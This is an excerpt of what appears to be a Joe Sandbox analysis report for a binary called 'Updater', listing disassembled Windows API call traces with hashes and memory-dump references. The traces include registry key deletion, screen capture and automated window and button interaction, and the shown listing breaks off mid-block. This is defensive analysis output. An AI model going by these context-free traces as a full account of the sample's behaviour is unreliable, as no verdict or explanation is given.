                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                    • Opcode ID: 80c6f177b627b7883658a7ad011cace91421980d7e309e649ffd083f7051d0d1
                                                                                                                                                    • Instruction ID: e4a2e4a6b67ae1e62bb86129bf96da50d1b9b8dbca755196031ca3687b3920c1
                                                                                                                                                    • Opcode Fuzzy Hash: 80c6f177b627b7883658a7ad011cace91421980d7e309e649ffd083f7051d0d1
                                                                                                                                                    • Instruction Fuzzy Hash: 85412975600204AFDB109F69DC88EAABBBDFF89711F108159F905E7260EBB5AD01DB20
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00B9225D
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00B92266
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B92272
                                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B92358
                                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00B923B4
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B92465
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B924E9
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B92535
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B92544
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00B92582
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                                                                    • Opcode ID: e496b152d6375b27b0dd4e35bbc07136dd2dce7ace91dd3b6562e24b56df6108
                                                                                                                                                    • Instruction ID: 49afe93fba86562f2dc4e7572c9d5b7465ffc0a3716d04aacc319b2882bcf805
                                                                                                                                                    • Opcode Fuzzy Hash: e496b152d6375b27b0dd4e35bbc07136dd2dce7ace91dd3b6562e24b56df6108
                                                                                                                                                    • Instruction Fuzzy Hash: 49D1B871A00216EBDF14AFA5D885B79B7F4FF08700F1085E9E909AB281DB74ED44DBA1
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC0F4
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC172
                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00BAC20A
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BAC27E
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BAC29C
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BAC2F2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BAC304
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BAC322
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00BAC383
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BAC394
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue_wcslen
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2361764144-4033151799
                                                                                                                                                    • Opcode ID: 998a54749706a25c2971e71478d599ba933d32e7f42229a226dc307cc8e4e6f6
                                                                                                                                                    • Instruction ID: 8d89e3bca64b307f2f2c85ccdc35ee48b87458310e76fd0ec9d8312ff3a4a5ea
                                                                                                                                                    • Opcode Fuzzy Hash: 998a54749706a25c2971e71478d599ba933d32e7f42229a226dc307cc8e4e6f6
                                                                                                                                                    • Instruction Fuzzy Hash: 69C17D35208201AFDB10DF64C494F2ABBE1FF89314F54859CF45A9B2A2CB75ED46CB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00BA3181
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BA3191
                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00BA319D
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00BA31AA
                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BA3216
                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BA3255
                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BA3279
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00BA3281
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00BA328A
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00BA3291
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00BA329C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                    • Opcode ID: ebca83368a6483328d388e34064304b8491c4df1353cbaae924845c6e7358fc2
                                                                                                                                                    • Instruction ID: 383cb7821aca59a266c2e3437656933f5ff7c8c38048c23d9d01d0800788f8eb
                                                                                                                                                    • Opcode Fuzzy Hash: ebca83368a6483328d388e34064304b8491c4df1353cbaae924845c6e7358fc2
                                                                                                                                                    • Instruction Fuzzy Hash: 1361E275D00219AFCF04CFA8D884AAEBBF5FF48710F20856AE955A7210E775AA41CF50
                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00B5D8D1
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D489
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D49B
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4AD
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4BF
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4D1
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4E3
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4F5
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D507
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D519
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D52B
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D53D
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D54F
                                                                                                                                                      • Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D561
                                                                                                                                                    • _free.LIBCMT ref: 00B5D8C6
                                                                                                                                                      • Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A
                                                                                                                                                    • _free.LIBCMT ref: 00B5D8E8
                                                                                                                                                    • _free.LIBCMT ref: 00B5D8FD
                                                                                                                                                    • _free.LIBCMT ref: 00B5D908
                                                                                                                                                    • _free.LIBCMT ref: 00B5D92A
                                                                                                                                                    • _free.LIBCMT ref: 00B5D93D
                                                                                                                                                    • _free.LIBCMT ref: 00B5D94B
                                                                                                                                                    • _free.LIBCMT ref: 00B5D956
                                                                                                                                                    • _free.LIBCMT ref: 00B5D98E
                                                                                                                                                    • _free.LIBCMT ref: 00B5D995
                                                                                                                                                    • _free.LIBCMT ref: 00B5D9B2
                                                                                                                                                    • _free.LIBCMT ref: 00B5D9CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FreeHeap___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 358854727-0
                                                                                                                                                    • Opcode ID: 6b08b1287b9a8f84c33d379d0ec8645f42f42a4dfb7ffdc35eac39553aa18864
                                                                                                                                                    • Instruction ID: 1c591d754648406823b24f5069c6f5115c979d89bf7f680201f00a2ca0b3614f
                                                                                                                                                    • Opcode Fuzzy Hash: 6b08b1287b9a8f84c33d379d0ec8645f42f42a4dfb7ffdc35eac39553aa18864
                                                                                                                                                    • Instruction Fuzzy Hash: A3319832608341DFEB35EB38D845B5AB3E8EF05312F104AE9E959C7191DE31AD88DB20
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B8473E
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B84749
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B84848
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B848B9
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B8491D
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B84942
                                                                                                                                                    • GetParent.USER32(?), ref: 00B84960
                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 00B84967
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B849E1
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B84A1D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                                    • String ID: %s%u
                                                                                                                                                    • API String ID: 4010501982-679674701
                                                                                                                                                    • Opcode ID: 3c456f2d3347ebbc6cb0af71e320bda6d005b4e732e0cf714524f8c4732745bb
                                                                                                                                                    • Instruction ID: 04a51d358888b549646fc380c2e57cd77959c9c48668bce217d5209d4e2b75b9
                                                                                                                                                    • Opcode Fuzzy Hash: 3c456f2d3347ebbc6cb0af71e320bda6d005b4e732e0cf714524f8c4732745bb
                                                                                                                                                    • Instruction Fuzzy Hash: 5EA18B71204707EFDB24EF64C885BABB7E8FF44344F10896EF59A861A1EB30A945CB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B85928
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B8596A
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8597B
                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00B85987
                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B859BC
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B859F4
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B85A2D
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B85A87
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B85AB9
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B85B31
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                    • Opcode ID: a829ad29f670cdde0915fc43805cb7b69e0d67e3a1afec00c078c73e59cf9194
                                                                                                                                                    • Instruction ID: 546572bba363ed3fc1d019e4dd3c6f7af28eb7ae0572ad93f3c149bcfac2a2bc
                                                                                                                                                    • Opcode Fuzzy Hash: a829ad29f670cdde0915fc43805cb7b69e0d67e3a1afec00c078c73e59cf9194
                                                                                                                                                    • Instruction Fuzzy Hash: B191D531104B07AFDB28EF24C885BA9B7E8FF15314F0046A9F996830A1EB31ED55CB91
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BB9759
                                                                                                                                                    • GetFocus.USER32 ref: 00BB9769
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00BB9774
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BB98CA
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00BB98EA
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00BB98FD
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BB9933
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BB997D
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB99B5
                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BB99EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                                    • Opcode ID: 4a02aeabbea9dbb7f09e8cf62fcd8b34037031793fc8ee690eb88494dd9ab7de
                                                                                                                                                    • Instruction ID: 0f39c0405663a60534ad2b0488a3516dd554b0c9a538347502289917e171f358
                                                                                                                                                    • Opcode Fuzzy Hash: 4a02aeabbea9dbb7f09e8cf62fcd8b34037031793fc8ee690eb88494dd9ab7de
                                                                                                                                                    • Instruction Fuzzy Hash: 0C81A171504301AFDB14DF14C884ABBBBE8FF89714F1049ADFA9597291DBB0E905CB62
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(00BF2970,000000FF,00000000,00000030), ref: 00B8CE60
                                                                                                                                                    • SetMenuItemInfoW.USER32(00BF2970,00000004,00000000,00000030), ref: 00B8CE95
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00B8CEA7
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00B8CEED
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00B8CF0A
                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00B8CF36
                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00B8CF7D
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B8CFC3
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CFD8
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CFF9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                    • Opcode ID: 53c1897626389a10970bd769e8fd81a35d96e333b822e24a0f26954fa6f5585d
                                                                                                                                                    • Instruction ID: c25510107fc7d16b5501fae59f021c5f86c0aa7b700e7015f6d9e3931501cfc6
                                                                                                                                                    • Opcode Fuzzy Hash: 53c1897626389a10970bd769e8fd81a35d96e333b822e24a0f26954fa6f5585d
                                                                                                                                                    • Instruction Fuzzy Hash: 19617FB090024AAFEF21EF64D988AFE7FE9EB05304F144195F901A32A1DB75AD15CB71
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BAD623
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BAD64C
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BAD709
                                                                                                                                                      • Part of subcall function 00BAD5F3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BAD669
                                                                                                                                                      • Part of subcall function 00BAD5F3: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BAD67C
                                                                                                                                                      • Part of subcall function 00BAD5F3: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BAD68E
                                                                                                                                                      • Part of subcall function 00BAD5F3: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BAD6C4
                                                                                                                                                      • Part of subcall function 00BAD5F3: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BAD6E7
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BAD6B2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                    • Opcode ID: fdac24e1e3d58e7da55c190238fd79eb610a54a57ae6bc01e907aec5262efee8
                                                                                                                                                    • Instruction ID: b43d883e6c4f24b71c6c4cb22c9532dcbbf2ca3e0764455560c2e55da3ed9c6c
                                                                                                                                                    • Opcode Fuzzy Hash: fdac24e1e3d58e7da55c190238fd79eb610a54a57ae6bc01e907aec5262efee8
                                                                                                                                                    • Instruction Fuzzy Hash: 1A317275901129BBD7209B95DC88EFFBBBCEF56710F0001A5F806E3154EB745E46DAA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B9494E
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B9497C
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B949AD
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B949D2
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B94A5C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B94A67
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00B94A70
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B94A7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                                                    • Opcode ID: e368b737078effd9b318b8409889f6bfc594630245a4f29a2f9d92134fc0cc29
                                                                                                                                                    • Instruction ID: 4d6a4a2622aced82a84ba9259ba29ac95cdf889415900a88a3bdf596191e2d4b
                                                                                                                                                    • Opcode Fuzzy Hash: e368b737078effd9b318b8409889f6bfc594630245a4f29a2f9d92134fc0cc29
                                                                                                                                                    • Instruction Fuzzy Hash: 8A317E7294410AABDB21DFA0DC49FEB37FCEF88740F1042B6FA08D2160EB7496458B64
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00B8F521
                                                                                                                                                      • Part of subcall function 00B3FB90: timeGetTime.WINMM(?,?,00B8F540), ref: 00B3FB94
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B8F54D
                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006F4CF,00000000), ref: 00B8F571
                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B8F593
                                                                                                                                                    • SetActiveWindow.USER32 ref: 00B8F5B2
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B8F5C0
